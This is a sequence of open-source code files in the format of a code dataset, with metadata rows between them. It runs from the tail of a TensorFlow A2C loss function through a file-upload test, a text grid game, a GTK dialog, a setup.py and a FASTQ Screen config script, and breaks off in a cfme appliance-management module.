    advantages = td_lambda.temporal_differences
    baseline_loss = tf.multiply(
        tf.convert_to_tensor(baseline_cost, dtype=tf.float32),
        baseline_loss_td,
        name="baseline_loss")

    # Loss for the policy. Doesn't push additional gradients through
    # the advantages.
    pg_loss = policy_gradient_loss(
        policies, actions, advantages, policy_vars,
        name="policy_gradient_loss")

    total_loss = tf.add(pg_loss, baseline_loss, name="total_loss")

    if entropy_cost is not None:
      loss, extra = policy_entropy_loss(policies, policy_vars, entropy_scale_op)
      entropy = tf.reduce_sum(extra.entropy, axis=0, name="entropy")  # [B].
      entropy_loss = tf.multiply(
          tf.convert_to_tensor(entropy_cost, dtype=tf.float32),
          tf.reduce_sum(loss, axis=0),
          name="scaled_entropy_loss")  # [B].
      total_loss = tf.add(total_loss, entropy_loss,
                          name="total_loss_with_entropy")
    else:
      entropy = None
      entropy_loss = None

    extra = SequenceA2CExtra(
        entropy=entropy,
        entropy_loss=entropy_loss,
        baseline_loss=baseline_loss,
        policy_gradient_loss=pg_loss,
        advantages=advantages,
        discounted_returns=td_lambda.discounted_returns)
    return base_ops.LossOutput(total_loss, extra)
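
# End-to-end sketch of the A2C loss (illustrative; `mus`, `sigmas`,
# `baseline_values`, `actions`, `rewards`, `pcontinues` and `bootstrap_value`
# are assumed to be tensors shaped as documented above):
#
#   policies = tfp.distributions.MultivariateNormalDiag(mus, sigmas)
#   loss, extra = sequence_a2c_loss(
#       policies, baseline_values, actions, rewards, pcontinues,
#       bootstrap_value, policy_vars=[mus, sigmas],
#       lambda_=0.95, entropy_cost=0.01, baseline_cost=0.5)
#   train_op = tf.train.AdamOptimizer().minimize(tf.reduce_mean(loss))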
| apache-2.0 | -7,097,839,571,736,575,000 | 48.258065 | 80 | 0.688397 | false |
thomaserlang/storitch | tests/upload.py | 1 | 2441 |
import requests, logging, json
from storitch import config, config_load, logger


def upload_multipart():
    r = requests.post(
        'http://127.0.0.1:{}/store'.format(config['port']),
        files={'file': open('test1.txt', 'rb')}
    )
    logging.debug(r.text)
    logging.debug(r.status_code)
    r.raise_for_status()
    assert r.status_code == 201
    d = r.json()
    assert d[0]['hash'] == 'f29bc64a9d3732b4b9035125fdb3285f5b6455778edca72414671e0ca3b2e0de'
    assert d[0]['type'] == 'file'


def upload_stream():
    session = ''
    with open('test1.txt', 'rb') as f:
        while True:
            d = f.read(5)
            r = requests.put(
                'http://127.0.0.1:{}/store/session'.format(config['port']),
                data=d,
                headers={
                    'Content-Type': 'application/octet-stream',
                    'storitch-json': json.dumps({
                        'session': session,
                        'filename': 'testæøå.txt',
                        'finished': False if d else True
                    })
                },
            )
            logging.debug(r.text)
            logging.debug(r.status_code)
            r.raise_for_status()
            j = r.json()
            logging.debug(j)
            if 'session' in j:
                session = j['session']
            if not d:
                break
    logging.debug(j)
    assert j['hash'] == 'f29bc64a9d3732b4b9035125fdb3285f5b6455778edca72414671e0ca3b2e0de'
    assert j['type'] == 'file'
    assert j['filename'] == 'testæøå.txt'


def thumbnail():
    r = requests.post(
        'http://127.0.0.1:{}/store'.format(config['port']),
        files={'file': open('test.png', 'rb')}
    )
    logging.debug(r.text)
    logging.debug(r.status_code)
    r.raise_for_status()
    assert r.status_code == 201
    d = r.json()
    assert d[0]['hash'] == '1171aad9f52efe4f577ccabec4aaeb063e28a80978f3853721381bca2b5fe501'
    assert d[0]['type'] == 'image'
    assert d[0]['width'] == 5
    assert d[0]['height'] == 5

    r = requests.get(
        'http://127.0.0.1:{}/1171aad9f52efe4f577ccabec4aaeb063e28a80978f3853721381bca2b5fe501@.jpg'.format(config['port']),
    )
    logging.debug(r.text)
    logging.debug(r.status_code)
    assert r.status_code == 200


if __name__ == '__main__':
    config_load()
    logger.set_logger(None)
    upload_multipart()
    upload_stream()
    thumbnail()
| mit | -842,656,900,377,164,300 | 31.48 | 123 | 0.540041 | false |
idivanov/amazing-game | game.py | 1 | 6382 |
from battle import *
from weapon import *
import maps
import random


class Game():

    def __init__(self, map):
        self.map = map
        self.player_location = 0
        self.character = None

    def print_map(self):
        '''Printing the map'''
        self.update_location()
        for row in range(maps.ROWS):
            line = ""
            for _ in range(maps.COLUMNS):
                line += self.map[row * 10 + _]
            print(line)
        print()

    def update_location(self):
        '''Updating the location of the player in the map'''
        new_map = ""
        for _ in range(50):
            if _ == self.player_location:
                new_map += 'P'
            elif self.map[_] == 'P' and _ != self.player_location:
                new_map += '.'
            else:
                new_map += self.map[_]
        self.map = new_map

    def move_right(self):
        '''Move to the right square if it is available and not blocked'''
        if ((maps.COLUMNS - 1) - self.player_location) % maps.COLUMNS == 0 \
                and self.player_location != 0:
            return False
        if self.map[self.player_location + 1] == '#':
            return False
        self.player_location += 1
        self.update_location()
        return True

    def move_left(self):
        '''Move to the left square if it is available and not blocked'''
        if self.player_location % maps.COLUMNS == 0:
            return False
        if self.map[self.player_location - 1] == '#':
            return False
        self.player_location -= 1
        self.update_location()
        return True

    def move_up(self):
        '''Move to the up square if it is available and not blocked'''
        if self.player_location < maps.COLUMNS:
            return False
        if self.map[self.player_location - maps.COLUMNS] == '#':
            return False
        self.player_location -= maps.COLUMNS
        self.update_location()
        return True

    def move_down(self):
        '''Move to the down square if it is available and not blocked'''
        if self.player_location >= (maps.ROWS - 1) * maps.COLUMNS:
            return False
        if self.map[self.player_location + maps.COLUMNS] == '#':
            return False
        self.player_location += maps.COLUMNS
        self.update_location()
        return True

    def user_input(self, message):
        return input(message + "\nEnter here: ")

    def select_weapon(self, weapon=None):
        '''Choosing your weapon'''
        if weapon is not None:
            self.character.equip_weapon(weapon)
            return
        weapon_description = \
            "Now select your weapon. You can choose from:\n" + \
            "m - Mace (15 hp, 15 attack_power, 5 spell_power, 5 armor)\n" + \
            "a - Axe (20 hp, 15 attack_power, 0 spell_power, 10 armor)\n" + \
            "d - Dagger (10 hp, 5 attack_power, 25 spell_power, 5 armor)\n" + \
            "s - Shield (25 hp, 5 attack_power, 5 spell_power, 40 armor)\n"
        user_input = self.user_input(weapon_description)
        if user_input == 'm':
            self.character.equip_weapon(Weapon(15, 15, 5, 5))
        elif user_input == 'a':
            self.character.equip_weapon(Weapon(20, 15, 0, 10))
        elif user_input == 'd':
            self.character.equip_weapon(Weapon(10, 5, 25, 5))
        elif user_input == 's':
            self.character.equip_weapon(Weapon(25, 5, 5, 40))
        else:
            self.character.equip_weapon(Weapon(10, 10, 10, 10))

    def select_character(self, character=None, weapon=None):
        '''Selecting your character'''
        if character is not None:
            self.character = character
            self.select_weapon(weapon)
            return
        class_description = "You must select your character now." + \
            " Choose between Mage, Warrior and Paladin\n" + \
            "Press m, w or p for each class"
        name_description = "Please enter your name"
        character_class = self.user_input(class_description)
        character_name = self.user_input(name_description)
        if character_class == 'p':
            self.character = Paladin(character_name)
        elif character_class == 'm':
            self.character = Mage(character_name)
        else:
            self.character = Warrior(character_name)
        self.select_weapon()

    def play(self, is_test=False):
        '''Playing the game until you die or reach the treasure'''
        turn_description = "MOVE! Press: " + \
            "\nw - up\na - left\ns - down\nd - right\n"
        if is_test is False:
            self.select_character()
        user_input = ""
        while self.player_location != 49 and is_test is False:
            self.print_map()
            user_input = self.user_input(turn_description)
            if user_input == 'w':
                self.move_up()
            elif user_input == 's':
                self.move_down()
            elif user_input == 'a':
                self.move_left()
            elif user_input == 'd':
                self.move_right()
            else:
                continue
            self.print_map()
            luck = int(random.uniform(1, 4))
            if luck == 1:
                print("You are very lucky and there are no enemies!\n" +
                      " You may continue your journey!")
                continue
            elif luck == 2:
                print("You will fight a warlock. Good luck!")
                fight = Battle(self.character, Warlock())
                fight.start()
                print(fight.result())
            elif luck == 3:
                print("You will fight a berserker. Good luck!")
                fight = Battle(self.character, Berserker())
                fight.start()
                print(fight.result())
            if not self.character.is_alive():
                print("You are dead.")
                return "You lost!"
        if self.player_location == 49 and is_test is False:
            print("You reached the goal. Now you will fight the boss")
            fight = Battle(self.character, Boss())
            fight.start()
            return (fight.result())
        else:
            print("You must have found a bug in the game. Congrats anyway!")
            return "You won!" if self.character.is_alive() else "You lost!"
| gpl-3.0 | -4,598,051,306,032,373,000 | 33.874317 | 78 | 0.532435 | false |
niavok/perroquet | perroquetlib/gui/gui_message_dialog.py | 1 | 2149 |
# -*- coding: utf-8 -*-

# Copyright (C) 2009-2011 Frédéric Bertolus.
#
# This file is part of Perroquet.
#
# Perroquet is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Perroquet is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Perroquet. If not, see <http://www.gnu.org/licenses/>.

import gettext

import gtk

from perroquetlib.config import config

_ = gettext.gettext


class GuiMessageDialog:

    def __init__(self, parent):
        self.config = config
        self.parent = parent

        self.builder = gtk.Builder()
        self.builder.set_translation_domain("perroquet")
        self.builder.add_from_file(self.config.get("ui_message_path"))
        self.builder.connect_signals(self)
        self.dialog = self.builder.get_object("dialog_message")
        self.dialog.set_modal(True)
        self.dialog.set_transient_for(self.parent)
        self.result = False

    def set_message(self, title, message):
        self.builder.get_object("label_message").set_text(message)
        self.dialog.set_title(title)

    def run(self):
        self.dialog.run()
        self.dialog.destroy()

    def on_button_reset_ok_clicked(self, widget, data=None):
        self.dialog.response(gtk.RESPONSE_OK)

    def on_button_reset_cancel_clicked(self, widget, data=None):
        self.result = None
        self.dialog.response(gtk.RESPONSE_CANCEL)

    def on_entry_password_activate(self, widget, data=None):
        self.result = self.builder.get_object("entry_password").get_text()
        self.dialog.response(gtk.RESPONSE_OK)

    def on_dialog_password_delete_event(self, widget, data=None):
        self.result = None
        self.dialog.response(gtk.RESPONSE_CANCEL)
        return True
| gpl-3.0 | -2,429,260,379,607,803,400 | 32.546875 | 74 | 0.690265 | false |
2degrees/twapi-users | setup.py | 1 | 1970 |
##############################################################################
#
# Copyright (c) 2015, 2degrees Limited.
# All Rights Reserved.
#
# This file is part of twapi-users
# <https://github.com/2degrees/twapi-users>, which is subject to the
# provisions of the BSD at
# <http://dev.2degreesnetwork.com/p/2degrees-license.html>. A copy of the
# license should accompany this distribution. THIS SOFTWARE IS PROVIDED "AS IS"
# AND ANY AND ALL EXPRESS OR IMPLIED WARRANTIES ARE DISCLAIMED, INCLUDING, BUT
# NOT LIMITED TO, THE IMPLIED WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST
# INFRINGEMENT, AND FITNESS FOR A PARTICULAR PURPOSE.
#
##############################################################################

import os

from setuptools import find_packages
from setuptools import setup

_CURRENT_DIR_PATH = os.path.abspath(os.path.dirname(__file__))
_README_CONTENTS = open(os.path.join(_CURRENT_DIR_PATH, 'README.rst')).read()
_VERSION = \
    open(os.path.join(_CURRENT_DIR_PATH, 'VERSION.txt')).readline().rstrip()

_LONG_DESCRIPTION = _README_CONTENTS

setup(
    name='twapi_users',
    version=_VERSION,
    description='API client for user-related endpoints of the 2degrees '
                'platform',
    long_description=_LONG_DESCRIPTION,
    classifiers=[
        'Development Status :: 3 - Alpha',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: BSD License',
        'Natural Language :: English',
        'Programming Language :: Python :: 3 :: Only',
    ],
    keywords='2degrees',
    author='2degrees Limited',
    author_email='[email protected]',
    url='https://github.com/2degrees/twapi-users/',
    license='BSD (http://dev.2degreesnetwork.com/p/2degrees-license.html)',
    packages=find_packages(exclude=['tests']),
    install_requires=[
        'twapi-connection >= 2.0a2',
        'pyrecord >= 1.0a1',
        'voluptuous >= 0.10.5',
    ],
    test_suite='nose.collector',
)
| bsd-3-clause | -7,853,972,193,506,642,000 | 34.818182 | 79 | 0.62335 | false |
mlesche/deep_seq_pipeline | deep_seq_pipeline/src/configfile/createconfigFastqScreen.py | 1 | 7124 |
#!/usr/bin/env python

'''
The MIT License (MIT)

Copyright (c) <2014> <Mathias Lesche>

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.

contact: mat.lesche(at)gmail.com
'''

''' python modules '''
import logging

from argparse import ArgumentParser
from argparse import RawDescriptionHelpFormatter
from types import NoneType

''' own modules '''
from configfile.configbuild import ConfigBuild
from main.information import Information
from main.io_module import add_FilestoList_recursive_depth
from main.io_module import check_Directorylist
from main.io_module import check_Fileslist
from main.main_logger import MainLogger


class Parser(object):
    def __init__(self):
        self.__parser = ArgumentParser(description="""
        Script builds the configuration file for the
        Fastq Screen Pipeline. The file can also be built by hand,
        but the script helps narrowing things down.""",
            formatter_class=RawDescriptionHelpFormatter)
        self.initialiseParser()
        self.__log = False
        self.__logger = ''
        self.start_logging()
        self.__directory = ''
        self.__files = ''
        self.__filelist = []
        self.__workdir = ''
        self.__readtype = ''

    def initialiseParser(self):
        self.__parser.add_argument('-d', '--directory', type=str, metavar='DIRECTORY', dest='directory', nargs='+', help="directories with fastq files (' ' separated)")
        self.__parser.add_argument('-f', '--files', type=str, metavar='FILE', dest='files', nargs='+', help="list of fastq files (' ' separated)")
        self.__parser.add_argument("-r", "--read-type", dest='readtype', choices=('se', 'pe'), required=True, help='single-end or paired-end')
        self.__parser.add_argument("-w", "--workdir", type=str, metavar='DIRECTORY', dest='workdir', required=True, help='all files of the project will be stored here')

    def parse(self, inputstring=None):
        if isinstance(inputstring, NoneType):
            self.__options = self.__parser.parse_args()
        else:
            self.__options = self.__parser.parse_args(inputstring)

    def getParser(self):
        return self.__parser

    def start_logging(self):
        self.__log = True
        self.__logger = logging.getLogger('pipeline.configfile.fastq_screen')

    def show_log(self, level, message):
        if self.__log:
            if level == 'debug':
                self.__logger.debug(message)
            elif level == 'info':
                self.__logger.info(message)
            elif level == 'warning':
                self.__logger.warning(message)
            elif level == 'error':
                self.__logger.error(message)
            elif level == 'critical':
                self.__logger.critical(message)
        else:
            print message

    def checkDirectory(self):
        filelist = []
        if isinstance(self.__directory, NoneType):
            return filelist
        dirlist = self.__directory
        good, bad = check_Directorylist(dirlist)
        for i in good:
            self.show_log('info', "valid directory: {0}".format(i))
        for i in bad:
            self.show_log('warning', "check directory: {0}".format(i))
        self.__directory = good
        if len(self.__directory) == 0:
            self.show_log('warning', "no directory given with -d was valid")

    def checkFiles(self):
        if isinstance(self.__files, NoneType):
            return []
        good, bad = check_Fileslist(self.__files)
        goodfiles = [i for i in good if i.endswith(('fastq.gz', 'fastq', 'fq.gz', 'fq'))]
        badfiles = [i for i in good if not i.endswith(('fastq.gz', 'fastq', 'fq.gz', 'fq'))]
        badfiles.extend(bad)
#        for i in goodfiles:
#            self.show_log('info', "{0}.{1} - valid file: {2}".format(self.__classname, getframe().f_code.co_name, i))
        for i in badfiles:
            self.show_log('warning', "check file: {0}".format(i))
        self.__files = goodfiles

    def check_workdir(self):
        good = check_Directorylist((self.__workdir, ))[0]
        if len(good) != 1:
            self.show_log('error', "check output directory: {0}".format(self.__workdir))
            exit(2)
        else:
            self.__workdir = good[0]
            self.show_log('info', "output directory: {0}".format(self.__workdir))

    def build_filelist(self):
        for dirname in self.__directory:
            self.__filelist.extend(add_FilestoList_recursive_depth(dirname, [], [], 0, 1))
        self.__filelist.extend(self.__files)

    def main(self):
        self.__readtype = self.__options.readtype
        self.__workdir = self.__options.workdir
        self.show_log('info', 'files will be treated as: {0}'.format(self.__readtype))
        self.check_workdir()

        if not isinstance(self.__options.directory, NoneType):
            self.__directory = self.__options.directory
            self.checkDirectory()

        if not isinstance(self.__options.files, NoneType):
            self.__files = self.__options.files
            self.checkFiles()

        self.build_filelist()
        if len(self.__filelist) == 0:
            self.show_log('error', "neither directory (-d) nor files (-f) provided files")
            exit(2)
        else:
            self.show_log('info', "{0} files will be used for fastq screen process".format(len(self.__filelist)))

    def get_filelist(self):
        return self.__filelist

    def get_readtype(self):
        return self.__readtype

    def get_workdir(self):
        return self.__workdir

    filelist = property(get_filelist, None, None, None)
    readtype = property(get_readtype, None, None, None)
    workdir = property(get_workdir, None, None, None)


class ConfigBuildFastqScreen(ConfigBuild):
    def __init__(self, workdir, filelist, seqtype):
        super(ConfigBuildFastqScreen, self).__init__(workdir)
        self.start_logging('pipeline.configfile.fastq_screen')
        self._filelist = filelist
        self._seqtype = seqtype
        self._configfilename = 'config_fastqscreen.txt'

    def main(self):
        self.process_main()
        self.process_fastq(self._filelist, True)
        self.process_fastqscreen(self._seqtype)
        self._input = '{0}\n{1}\n{2}'.format(self._mainstring, self._fastqstring, self._fastqscreenstring)
        self.write_config()


if __name__ == '__main__':
    mainlog = MainLogger('', False)
    parseinst = Parser()
    parseinst.parse()
    parseinst.main()
    inst = ConfigBuildFastqScreen(parseinst.workdir, parseinst.filelist, parseinst.readtype)
    inst.main()
    Information.SEQTYPE = parseinst.readtype
| mit | 661,324,221,369,928,000 | 33.926471 | 171 | 0.675463 | false |
psav/cfme_tests | cfme/utils/appliance/__init__.py | 1 | 123036 |
import json
import logging
import socket
import traceback
from copy import copy
from datetime import datetime
from tempfile import NamedTemporaryFile
from textwrap import dedent
from time import sleep, time
import attr
import dateutil.parser
import fauxfactory
import os
import re
import requests
import sentaku
import six
import warnings
import yaml
from cached_property import cached_property
from debtcollector import removals
from manageiq_client.api import APIException, ManageIQClient as VanillaMiqApi
from six.moves.urllib.parse import urlparse
from werkzeug.local import LocalStack, LocalProxy
from cfme.utils import clear_property_cache
from cfme.utils import conf, ssh, ports
from cfme.utils.datafile import load_data_file
from cfme.utils.log import logger, create_sublogger, logger_wrap
from cfme.utils.net import net_check
from cfme.utils.path import data_path, patches_path, scripts_path, conf_path
from cfme.utils.ssh import SSHTail
from cfme.utils.version import Version, get_stream, pick
from cfme.utils.wait import wait_for, TimedOutError
from cfme.fixtures import ui_coverage
from cfme.fixtures.pytest_store import store
from .db import ApplianceDB
from .implementations.rest import ViaREST
from .implementations.ssui import ViaSSUI
from .implementations.ui import ViaUI
from .services import SystemdService
RUNNING_UNDER_SPROUT = os.environ.get("RUNNING_UNDER_SPROUT", "false") != "false"
# EMS types recognized by IP or credentials
RECOGNIZED_BY_IP = [
    "InfraManager", "ContainerManager", "Openstack::CloudManager"
]
RECOGNIZED_BY_CREDS = ["CloudManager", "Nuage::NetworkManager"]
# A helper for the IDs
SEQ_FACT = 1e12
def _current_miqqe_version():
    """Parses MiqQE JS patch version from the patch file

    Returns: Version as int
    """
    with patches_path.join('miq_application.js.diff').open("r") as f:
        match = re.search("MiqQE_version = (\d+);", f.read(), flags=0)
    version = int(match.group(1))
    return version
current_miqqe_version = _current_miqqe_version()
class MiqApi(VanillaMiqApi):
    def get_entity_by_href(self, href):
        """Parses the collections"""
        parsed = urlparse(href)
        # TODO: Check the netloc, scheme
        path = [step for step in parsed.path.split('/') if step]
        # Drop the /api
        path = path[1:]
        collection = getattr(self.collections, path.pop(0))
        entity = collection(int(path.pop(0)))
        if path:
            raise ValueError('Subcollections not supported! ({})'.format(parsed.path))
        return entity
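
# For example (illustrative href; assumes the REST API exposes a `vms`
# collection):
#
#   api.get_entity_by_href('https://appliance/api/vms/42')
#
# resolves to `api.collections.vms(42)`, while a subcollection href such as
# 'https://appliance/api/vms/42/snapshots/1' raises ValueError.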
class ApplianceException(Exception):
    pass


class ApplianceConsole(object):
    """ApplianceConsole is used for navigating and running appliance_console commands against an
    appliance."""

    def __init__(self, appliance):
        self.appliance = appliance

    def timezone_check(self, timezone):
        channel = self.appliance.ssh_client.invoke_shell()
        channel.settimeout(20)
        channel.send("ap")
        result = ''
        try:
            while True:
                result += channel.recv(1)
                if ("{}".format(timezone[0])) in result:
                    break
        except socket.timeout:
            pass
        logger.debug(result)

    def run_commands(self, commands, autoreturn=True, timeout=10, channel=None):
        if not channel:
            channel = self.appliance.ssh_client.invoke_shell()
        self.commands = commands
        for command in commands:
            if isinstance(command, basestring):
                command_string, timeout = command, timeout
            else:
                command_string, timeout = command
            channel.settimeout(timeout)
            if autoreturn:
                command_string = (command_string + '\n')
            channel.send("{}".format(command_string))

            result = ''
            try:
                while True:
                    result += channel.recv(1)
                    if 'Press any key to continue' in result:
                        break
            except socket.timeout:
                pass
            logger.debug(result)
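
# Usage sketch for `run_commands` (the menu inputs below are illustrative only
# and depend on the appliance_console build being driven):
#
#   console = ApplianceConsole(appliance)
#   console.run_commands(['ap', '2'])              # plain strings share `timeout`
#   console.run_commands([('4', 60)], timeout=10)  # a tuple carries its own timeout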
class ApplianceConsoleCli(object):

    def __init__(self, appliance):
        self.appliance = appliance

    def _run(self, appliance_console_cli_command):
        return self.appliance.ssh_client.run_command(
            "appliance_console_cli {}".format(appliance_console_cli_command))

    def set_hostname(self, hostname):
        self._run("--host {host}".format(host=hostname))

    def configure_appliance_external_join(self, dbhostname,
            username, password, dbname, fetch_key, sshlogin, sshpass):
        self._run("--hostname {dbhostname} --username {username} --password {password}"
            " --dbname {dbname} --verbose --fetch-key {fetch_key} --sshlogin {sshlogin}"
            " --sshpassword {sshpass}".format(dbhostname=dbhostname, username=username,
                password=password, dbname=dbname, fetch_key=fetch_key, sshlogin=sshlogin,
                sshpass=sshpass))

    def configure_appliance_external_create(self, region, dbhostname,
            username, password, dbname, fetch_key, sshlogin, sshpass):
        self._run("--region {region} --hostname {dbhostname} --username {username}"
            " --password {password} --dbname {dbname} --verbose --fetch-key {fetch_key}"
            " --sshlogin {sshlogin} --sshpassword {sshpass}".format(
                region=region, dbhostname=dbhostname, username=username, password=password,
                dbname=dbname, fetch_key=fetch_key, sshlogin=sshlogin, sshpass=sshpass))

    def configure_appliance_internal(self, region, dbhostname, username, password, dbname, dbdisk):
        self._run("--region {region} --internal --hostname {dbhostname} --username {username}"
            " --password {password} --dbname {dbname} --verbose --dbdisk {dbdisk}".format(
                region=region, dbhostname=dbhostname, username=username, password=password,
                dbname=dbname, dbdisk=dbdisk))

    def configure_appliance_internal_fetch_key(self, region, dbhostname,
            username, password, dbname, dbdisk, fetch_key, sshlogin, sshpass):
        self._run("--region {region} --internal --hostname {dbhostname} --username {username}"
            " --password {password} --dbname {dbname} --verbose --dbdisk {dbdisk} --fetch-key"
            " {fetch_key} --sshlogin {sshlogin} --sshpassword {sshpass}".format(
                region=region, dbhostname=dbhostname, username=username, password=password,
                dbname=dbname, dbdisk=dbdisk, fetch_key=fetch_key, sshlogin=sshlogin,
                sshpass=sshpass))

    def configure_appliance_dedicated_db(self, username, password, dbname, dbdisk):
        self._run("--internal --username {username} --password {password}"
            " --dbname {dbname} --verbose --dbdisk {dbdisk} --key --standalone".format(
                username=username, password=password, dbname=dbname, dbdisk=dbdisk))

    def configure_ipa(self, ipaserver, ipaprincipal, ipapassword, ipadomain=None, iparealm=None):
        cmd_result = self._run(
            '--ipaserver {s} --ipaprincipal {u} --ipapassword {p} {d} {r}'
            .format(s=ipaserver, u=ipaprincipal, p=ipapassword,
                    d='--ipadomain {}'.format(ipadomain) if ipadomain else '',
                    r='--iparealm {}'.format(iparealm) if iparealm else ''))
        logger.debug('IPA configuration output: %s', str(cmd_result))
        assert cmd_result.success
        assert 'ipa-client-install exit code: 1' not in cmd_result.output
        self.appliance.sssd.wait_for_running()
        assert self.appliance.ssh_client.run_command("cat /etc/ipa/default.conf "
                                                     "| grep 'enable_ra = True'")

    def configure_appliance_dedicated_ha_primary(
            self, username, password, reptype, primhost, node, dbname):
        self._run("--username {username} --password {password} --replication {reptype}"
            " --primary-host {primhost} --cluster-node-number {node} --auto-failover --verbose"
            " --dbname {dbname}".format(
                username=username, password=password, reptype=reptype, primhost=primhost,
                node=node, dbname=dbname))

    def configure_appliance_dedicated_ha_standby(
            self, username, password, reptype, primhost, standhost, node, dbname, dbdisk):
        self._run("--internal --username {username} --password {password} --replication {reptype}"
            " --primary-host {primhost} --standby-host {standhost} --cluster-node-number {node}"
            " --auto-failover --dbname {dbname} --verbose --dbdisk {dbdisk}"
" --standalone".format(username=username, password=password, reptype=reptype,
primhost=primhost, standhost=standhost, node=node, dbname=dbname, dbdisk=dbdisk))
def uninstall_ipa_client(self):
assert self._run("--uninstall-ipa")
assert not self.appliance.ssh_client.run_command("cat /etc/ipa/default.conf")
class IPAppliance(object):
"""IPAppliance represents an already provisioned cfme appliance whos provider is unknown
but who has an IP address. This has a lot of core functionality that Appliance uses, since
it knows both the provider, vm_name and can there for derive the IP address.
Args:
hostname: The IP address or host name of the provider
ui_protocol: The protocol used in the URL
ui_port: The port where the UI runs.
        browser_steal: If True then the current browser is killed and the new appliance
is used to generate a new session.
container: If the appliance is running as a container or as a pod, specifies its name.
project: openshift's project where the appliance is deployed
openshift_creds: If the appliance runs as a project on openshift, provides credentials for
the openshift host so the framework can interact with the project.
db_host: If the database is located somewhere else than on the appliance itself, specify
the host here.
db_port: Database port.
ssh_port: SSH port.
"""
_nav_steps = {}
evmserverd = SystemdService.declare(unit_name='evmserverd')
httpd = SystemdService.declare(unit_name='httpd')
sssd = SystemdService.declare(unit_name='sssd')
db = ApplianceDB.declare()
CONFIG_MAPPING = {
'hostname': 'hostname',
'ui_protocol': 'ui_protocol',
'ui_port': 'ui_port',
'browser_steal': 'browser_steal',
'container': 'container',
'pod': 'container',
'openshift_creds': 'openshift_creds',
'is_dev': 'is_dev',
'db_host': 'db_host',
'db_port': 'db_port',
'ssh_port': 'ssh_port',
'project': 'project',
}
CONFIG_NONGLOBAL = {'hostname'}
PROTOCOL_PORT_MAPPING = {'http': 80, 'https': 443}
CONF_FILES = {
'upstream_templates': '/var/www/miq/system/TEMPLATE',
'downstream_templates': '/opt/rh/cfme-appliance/TEMPLATE',
'pam_httpd_auth': '/etc/pam.d/httpd-auth',
'httpd_remote_user': '/etc/httpd/conf.d/manageiq-remote-user.conf',
'httpd_ext_auth': '/etc/httpd/conf.d/manageiq-external-auth.conf',
'openldap': '/etc/openldap/ldap.conf',
'sssd': '/etc/sssd/sssd.conf'
}
@property
def as_json(self):
"""Dumps the arguments that can create this appliance as a JSON. None values are ignored."""
return json.dumps({
k: getattr(self, k)
for k in set(self.CONFIG_MAPPING.values())})
@classmethod
def from_json(cls, json_string):
return cls(**json.loads(json_string))
def __init__(
self, hostname, ui_protocol='https', ui_port=None, browser_steal=False, project=None,
container=None, openshift_creds=None, db_host=None, db_port=None, ssh_port=None,
is_dev=False
):
if not isinstance(hostname, six.string_types):
raise TypeError('Appliance\'s hostname must be a string!')
self.hostname = hostname
if ui_protocol not in self.PROTOCOL_PORT_MAPPING:
raise TypeError(
'Wrong protocol {!r} passed, expected {!r}'.format(
ui_protocol, list(self.PROTOCOL_PORT_MAPPING.keys())))
self.ui_protocol = ui_protocol
self.ui_port = ui_port or self.PROTOCOL_PORT_MAPPING[ui_protocol]
self.ssh_port = ssh_port or ports.SSH
self.db_port = db_port or ports.DB
self.db_host = db_host
self.browser = ViaUI(owner=self)
self.ssui = ViaSSUI(owner=self)
self.rest_context = ViaREST(owner=self)
self.rest_context.strict_calls = False
self.context = MiqImplementationContext.from_instances(
[self.browser, self.ssui, self.rest_context])
from cfme.modeling.base import EntityCollections
self.collections = EntityCollections.for_appliance(self)
self.browser_steal = browser_steal
self.container = container
self.project = project
self.openshift_creds = openshift_creds or {}
self.is_dev = is_dev
self._user = None
self.appliance_console = ApplianceConsole(self)
self.appliance_console_cli = ApplianceConsoleCli(self)
if self.openshift_creds:
self.is_pod = True
else:
self.is_pod = False
def unregister(self):
""" unregisters appliance from RHSM/SAT6 """
self.ssh_client.run_command('subscription-manager remove --all')
self.ssh_client.run_command('subscription-manager unregister')
self.ssh_client.run_command('subscription-manager clean')
self.ssh_client.run_command('mv -f /etc/rhsm/rhsm.conf.kat-backup /etc/rhsm/rhsm.conf')
self.ssh_client.run_command('rpm -qa | grep katello-ca-consumer | xargs rpm -e')
def is_registration_complete(self, used_repo_or_channel):
""" Checks if an appliance has the correct repos enabled with RHSM or SAT6 """
result = self.ssh_client.run_command('yum repolist enabled')
# Check that the specified (or default) repo (can be multiple, separated by a space)
# is enabled and that there are packages available
for repo in used_repo_or_channel.split(' '):
if (repo not in result.output) or (not re.search(r'repolist: [^0]', result.output)):
return False
return True
@property
def default_zone(self):
return self.appliance.server.zone
@property
def server(self):
return self.collections.servers.get_master()
@property
def user(self):
from cfme.base.credential import Credential
if self._user is None:
# Admin by default
username = conf.credentials['default']['username']
password = conf.credentials['default']['password']
logger.info(
'%r.user was set to None before, therefore generating an admin user: %s/%s',
self, username, password)
cred = Credential(principal=username, secret=password)
user = self.collections.users.instantiate(
credential=cred, name='Administrator'
)
self._user = user
return self._user
@user.setter
def user(self, user_object):
if user_object is None:
logger.info('%r.user set to None, will be set to admin on next access', self)
self._user = user_object
@property
def appliance(self):
return self
def __repr__(self):
# TODO: Put something better here. This solves the purpose temporarily.
return '{}.from_json({!r})'.format(type(self).__name__, self.as_json)
def __call__(self, **kwargs):
"""Syntactic sugar for overriding certain instance variables for context managers.
Currently possible variables are:
* `browser_steal`
"""
